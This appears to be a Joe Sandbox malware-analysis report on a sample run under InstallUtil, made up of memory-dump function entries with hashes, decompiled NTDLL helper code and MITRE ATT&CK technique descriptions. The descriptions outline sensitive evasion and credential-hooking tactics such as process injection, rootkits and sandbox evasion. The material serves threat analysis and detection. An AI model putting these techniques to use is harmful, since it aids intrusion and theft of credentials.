Opcode Fuzzy Hash: ecfd6d94182ab58a221d9e58cd823d9ce13e3173701ad59e83cbfbbe785ad006
Instruction Fuzzy Hash: AF90027520145002D5447199844860B5405B7E1345F51C821E0415554CC655886AA261

Uniqueness

Uniqueness Score: -1.00%

Function 01309A10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f1747afce598d4b12a17829c05f050401cfb383a81ec542b9261728ecba1340
Instruction ID: 0f1d43bf42128bd450ba022355354ed7b162f904d1bf09fe1165fa0251d386e7
Opcode Fuzzy Hash: 1f1747afce598d4b12a17829c05f050401cfb383a81ec542b9261728ecba1340
Instruction Fuzzy Hash: 5C90027520141402D5046199480C7470405A7D1346F51C421A5154555EC6A5C8A57571

Uniqueness

Uniqueness Score: -1.00%

Function 01309A80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 771361274485398706d8b36495c4ea77f43f3424f250f326b715e9a7102d2018
Instruction ID: f1f06c079a0b3bcb653bd5d0c3e8bed54e525df85bbaf85b178badf8f10f9e36
Opcode Fuzzy Hash: 771361274485398706d8b36495c4ea77f43f3424f250f326b715e9a7102d2018
Instruction Fuzzy Hash: CF90026520145442D54462994808B0F4505A7E2346F91C429A4146554CC95588696761

Uniqueness

Uniqueness Score: -1.00%

Function 0130AD30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76ed6859ba467e031def712ba9a40d312bf121e709d6373f788d62fb12c40c98
Instruction ID: 38871af5a5ff3edeedec447352c0f7be3015841bac2a5d2d2ed9a0947d7ead86
Opcode Fuzzy Hash: 76ed6859ba467e031def712ba9a40d312bf121e709d6373f788d62fb12c40c98
Instruction Fuzzy Hash: 19900275A0501012D544719948186464406B7E1785B55C421A0504554CC9948A6963E1

Uniqueness

Uniqueness Score: -1.00%

Function 01309520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 041a74bb9725fa68463bd974c8f8075486d1daca04967e775bd98a6870f3fb88
Instruction ID: d2a7da4f0e25f8e6247e693ae4976febcc64162cd08a62f81b13d1ffc12ac4a6
Opcode Fuzzy Hash: 041a74bb9725fa68463bd974c8f8075486d1daca04967e775bd98a6870f3fb88
Instruction Fuzzy Hash: C99002E5201150928904A2998408B0A4905A7E1345B51C426E1044560CC5658865A175

Uniqueness

Uniqueness Score: -1.00%

Function 01309560 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7848ab64cccbdf27e23f3ea87921e1f5fb345b9843ac0c1fc1a82ac6269c5b3b
Instruction ID: da6ed29b4223349bff35b767ef14884f9474656191183c570d687b691d89413e
Opcode Fuzzy Hash: 7848ab64cccbdf27e23f3ea87921e1f5fb345b9843ac0c1fc1a82ac6269c5b3b
Instruction Fuzzy Hash: 8F900269221010024549A599060850B0845B7D7395391C425F1406590CC66188796361

Uniqueness

Uniqueness Score: -1.00%

Function 013095F0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0aef16063e3311bed51db346036eb64993a8046c58dc727dd3f97606c7847f48
Instruction ID: 146127ba377e78c1f843af9ea0294e58e951a8916b72f80e73eae57fa0e9e84c
Opcode Fuzzy Hash: 0aef16063e3311bed51db346036eb64993a8046c58dc727dd3f97606c7847f48
Instruction Fuzzy Hash: C190027520101802D508619948086860405A7D1345F51C421A6014655ED6A588A57171

Uniqueness

Uniqueness Score: -1.00%

Function 01309730 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6aa93beb461dcc36b4a6734e3383bd8ad22db6950b5a8306b48c92f3c90151d8
Instruction ID: 6f7cb8363dfbc835e7de91e329fe6d0b63c4bb255b581851ea8097c01fad49af
Opcode Fuzzy Hash: 6aa93beb461dcc36b4a6734e3383bd8ad22db6950b5a8306b48c92f3c90151d8
Instruction Fuzzy Hash: A490026560501402D5447199541C7060415A7D1345F51D421A0014554DC6998A6976E1

Uniqueness

Uniqueness Score: -1.00%

Function 0130A710 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdb357f9efc631dd084d09c5fb39ef156e59b912fcd061660394725fd96e1849
Instruction ID: 827719fb7ab7b37785cfe0217a096f39e3fbd1101dd3c4904e9af1720ab9832d
Opcode Fuzzy Hash: fdb357f9efc631dd084d09c5fb39ef156e59b912fcd061660394725fd96e1849
Instruction Fuzzy Hash: 1790027530101052D904A6D95808A4A4505A7F1345B51D425A4004554CC59488756161

Uniqueness

Uniqueness Score: -1.00%

Function 0130A770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eddc2db431eec1d7a53e63c336010d96382ca14a437e010e583ade461f0c284
Instruction ID: 6f04dbd8d1be34cdaf45c122b8aa65b5e90f56b2459fb91ce69a8737658810e5
Opcode Fuzzy Hash: 7eddc2db431eec1d7a53e63c336010d96382ca14a437e010e583ade461f0c284
Instruction Fuzzy Hash: BF90027920505442D90465995808A870405A7D1349F51D821A041459CDC6948875B161

Uniqueness

Uniqueness Score: -1.00%

Function 01309770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a06f21a788ac7c6b28dc3ba99c0fe883f804ab7b777afd12d33980c6f1cd823b
Instruction ID: 67adb8f486773aae831ebbeb60f3c84e7cc41c6a9eada2695a2096a02155d099
Opcode Fuzzy Hash: a06f21a788ac7c6b28dc3ba99c0fe883f804ab7b777afd12d33980c6f1cd823b
Instruction Fuzzy Hash: 7590026520505442D5046599540CA060405A7D1349F51D421A1054595DC6758865B171

Uniqueness

Uniqueness Score: -1.00%

Function 01309760 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22a7b3e9d66a96f08fd1985963110b46d63407f561c5499d771308552b31a5d2
Instruction ID: ede2742b648f95dd26fadc47fe9014ff810222e6447faedf6a200a611d8c5a42
Opcode Fuzzy Hash: 22a7b3e9d66a96f08fd1985963110b46d63407f561c5499d771308552b31a5d2
Instruction Fuzzy Hash: F290027520101403D5046199550C7070405A7D1345F51D821A0414558DD69688657161

Uniqueness

Uniqueness Score: -1.00%

Function 01309FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdef3ba1d55ff5cb334661d08aa6d76b7cda4a9176af07e4136585b1f41044c6
Instruction ID: 76b3d1ec92602afa6cc31e2d3024451f7bb3871937814d0e2c1cfb9865b68fc5
Opcode Fuzzy Hash: bdef3ba1d55ff5cb334661d08aa6d76b7cda4a9176af07e4136585b1f41044c6
Instruction Fuzzy Hash: 5690027531115402D514619984087060405A7D2345F51C821A0814558DC6D588A57162

Uniqueness

Uniqueness Score: -1.00%

Function 01309610 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba63956297cc33e8fb050e3a5bf778a8bf57a256403407f96a1ef3b390f8ae73
Instruction ID: 5d3c4b87ee0630ea9bcee067b21fab7248fe4495c1f18760ff988f1af96cb04a
Opcode Fuzzy Hash: ba63956297cc33e8fb050e3a5bf778a8bf57a256403407f96a1ef3b390f8ae73
Instruction Fuzzy Hash: 3E90027560501802D554719944187460405A7D1345F51C421A0014654DC7958A6976E1

Uniqueness

Uniqueness Score: -1.00%

Function 01309650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a43554a7e5f1679e84eb1e98aee6a367235a097019403033412e100d9e33f996
Instruction ID: 32e9587b7d161dc1c813073c8676a08cd8eef4222e4a03811026c536119a7af5
Opcode Fuzzy Hash: a43554a7e5f1679e84eb1e98aee6a367235a097019403033412e100d9e33f996
Instruction Fuzzy Hash: E190027520505842D54471994408A460415A7D1349F51C421A0054694DD6658D69B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 013096D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bd1a59a4be5bbeca61b1472b4d0f0f8c652fff35494a9ef430d7d1a11df459c
Instruction ID: 3a8e3832a441e5dbedf0deabf6be17cc86013848f09f7ea4caaab01f13e0685c
Opcode Fuzzy Hash: 1bd1a59a4be5bbeca61b1472b4d0f0f8c652fff35494a9ef430d7d1a11df459c
Instruction Fuzzy Hash: AE90027520101842D50461994408B460405A7E1345F51C426A0114654DC655C8657561

Uniqueness

Uniqueness Score: -1.00%

Function 01309670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 04ecf686a11e89cb9957f9afea7c912be5bf82e231fb4e0740bcdab2a700d994
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 012F645B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E012F645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x13bd360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E0130FA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E012E2280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E012DFFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x13bb1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E0130B640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x012f645b
0x012f6463
0x012f646d
0x012f6475
0x012f647a
0x012f647e
0x012f6480
0x012f648c
0x012f6490
0x012f6495
0x012f6498
0x012f649b
0x012f649f
0x012f64a1
0x01337c07
0x01337c09
0x01337c0c
0x00000000
0x012f64a7
0x012f64a7
0x012f64aa
0x01337bf7
0x01337c00
0x00000000
0x01337bf9
0x01337bf9
0x01337bf9
0x012f64b0
0x012f64b0
0x012f64b2
0x012f64b2
0x012f64b3
0x012f64ba
0x012f6553
0x012f655e
0x012f6566
0x012f656c
0x012f6575
0x012f657f
0x012f6585
0x012f6588
0x012f6588
0x012f64c7
0x012f64cb
0x012f64ce
0x012f64d3
0x012f64da
0x012f64e5
0x012f64ed
0x012f64f1
0x012f64f5
0x012f64f6
0x012f64fa
0x012f6502
0x012f6503
0x012f6504
0x012f6507
0x012f651a
0x012f6524
0x012f6524
0x012f6526
0x012f6526
0x012f64aa
0x012f652c
0x012f652d
0x012f652e
0x012f6539

APIs

RtlDebugPrintTimes.NTDLL ref: 012F651A

Strings

0, xrefs: 012F64FA
0, xrefs: 012F64E5

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: fb8f5329f22498befda62e56318542005d6c51c205e352f4eec08bd6c5596742
Instruction ID: 5c0e1c72966af88fb9682753efe8bfd4035709c462f06ca558ea1aebc8eb3f79
Opcode Fuzzy Hash: fb8f5329f22498befda62e56318542005d6c51c205e352f4eec08bd6c5596742
Instruction Fuzzy Hash: 85417CB16187069FC311CF28C584A1ABBE5FB88718F04466EF688DB341D771EA05CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0135FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0135FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0130CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01355720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01355720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0135fdda
0x0135fde2
0x0135fde5
0x0135fdec
0x0135fdfa
0x0135fdff
0x0135fe0a
0x0135fe0f
0x0135fe17
0x0135fe1e
0x0135fe19
0x0135fe19
0x0135fe19
0x0135fe20
0x0135fe21
0x0135fe22
0x0135fe25
0x0135fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0135FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0135FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0135FE2B

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: ed9f3c480f6fb73e1577791c59af5fcc4fe7405d7689e77a623c60d9357cb04e
Instruction ID: 68ffe4a54bcb3d0377e39107f23522caa546c49ee3498720b2b8fde0bd33a360
Opcode Fuzzy Hash: ed9f3c480f6fb73e1577791c59af5fcc4fe7405d7689e77a623c60d9357cb04e
Instruction Fuzzy Hash: 82F0F632200201BFE7611A49DC02F63BF5EEB44B74F240314FA28565D1EA62F86097F0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

